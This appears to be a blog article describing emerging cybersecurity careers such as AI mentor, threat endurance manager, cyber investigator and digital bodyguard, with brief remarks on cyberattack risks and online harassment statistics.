**AI Mentor**

The rise of AI-based technologies and assistants, such as speech-based systems (e.g. Siri, Alexa, Cortana, etc.) has helped make new technologies more accessible. At the same time, they introduce new privacy and security concerns, while their control, regulation, and monitoring requirements go beyond product management and development areas of expertise.

Speculative fiction writer William Gibson envisioned a Turing Police force in charge of controlling AI and AI-based systems in the technological future. We may realistically need AI mentors as a new type of expert who controls and assesses these technologies. Mentors' responsibilities may also include teaching AIs, controlling their access to data, imposing evolutionary constraints, and acting as a parent to the AI. As the complexity and sophistication of these technologies increases, there will be a growing demand for experts like these.

An AI mentor's assistant could be another role. They would be dedicated specialists responsible for creating a "stop" button to prevent AI systems from operating on their own. This involves the development of protection against malfunctions and alternative rescue plans in case computers are out of service.

**Cyber Immunity Developer**

For decades, people have developed new technologies first, only to think about the cybersecurity implications later. To make the world safer, we’ll need a “security-first” approach. Solutions with embedded cybersecurity principles help move us in that direction, allowing a device to be cyber-immune by default, with built-in protection against most types of cyberattack.

This will drive demand for developers with skills in this methodology, creating systems that are secure by design. These will be too expensive to hack, and the vast majority of threats won't be able to hinder their critical functions.

**Threat Endurance Manager**

A cyberattack can lead to the interruption of production and business processes, posing potential reputational risks and financial losses. Imagine an attacker interferes with the production process of a huge metal processing plant and disables the factory for a day. Because of this, they don't fulfill a bulk order which results in millions of dollars in losses.

Threat endurance managers will be in demand at critical infrastructure sites or large companies that cannot afford such a shutdown. These specialists will be responsible for business continuity and protect companies by controlling IT systems, responding to cyberattacks, and managing software and human errors.

**Cyber Investigator**

This profession already exists, but over the next few years it will become more complex and diverse, following the increased sophistication of digital systems and the trend toward automation.

We know that these specialists normally manage the aftermath of a security breach, covering the entire investigation and working to eliminate the threat to the organization. They collect evidence based on the results of the incident, analyze log files and events on the network, create indicators of compromise, and much more. Cyber investigators of the next generation will be generalists with skills not only in programming and hacking but also in psychology and decision-making in volatile conditions. Apart from that, they will be experts in robotics and AI, as they would have to work with those newly emerging systems.

**Digital Footprint Consultant**

This specialist plays a key role in the future protection of a brand against the potential negative effects of a cyber incident. Cyberattackers are well known for extracting data and blackmailing companies by threatening their reputation. Experts of the future will need to be able to assess a company's vulnerability to these sorts of risks and count skills related to safeguarding the image of the business among their competencies.

**Digital Bodyguard**

This will essentially be a consultant protecting a person’s digital identity. Like a bodyguard in the physical world, they will guard against things like doxing, cyber stalking, and other harassment. This bodyguard will help clients to protect their digital identities by cleaning their accounts and digital history, guiding and supporting their virtual lives.

In 2021, nearly 46% of US middle and high schoolers had been cyberbullied during their lifetime, while 41% of adults reported experiencing online harassment, and 24% said they'd been stalked using technology. In some cases, this can be combined with offline harassment or even physical violence. A proactive consultant would help protect children and adults from threats of this nature. When it does happen, they will act as a private digital security force, helping to disrupt the offender, identify them, and prevent similar incidents in the future. They could even help the victim cope with the incident from a psychological perspective. In many countries cyberbullying is a crime, so this profession might be in extra demand in those places.

You can hardly single out a business in which cybersecurity is not relevant. Even companies that don’t make money from it still often can have sizeable cybersecurity departments. Apple, for example, has an internal team that handles endpoint security. As technology and business continue to evolve, career opportunities in cybersecurity should remain plentiful and varied long into the future.

Tag

#apple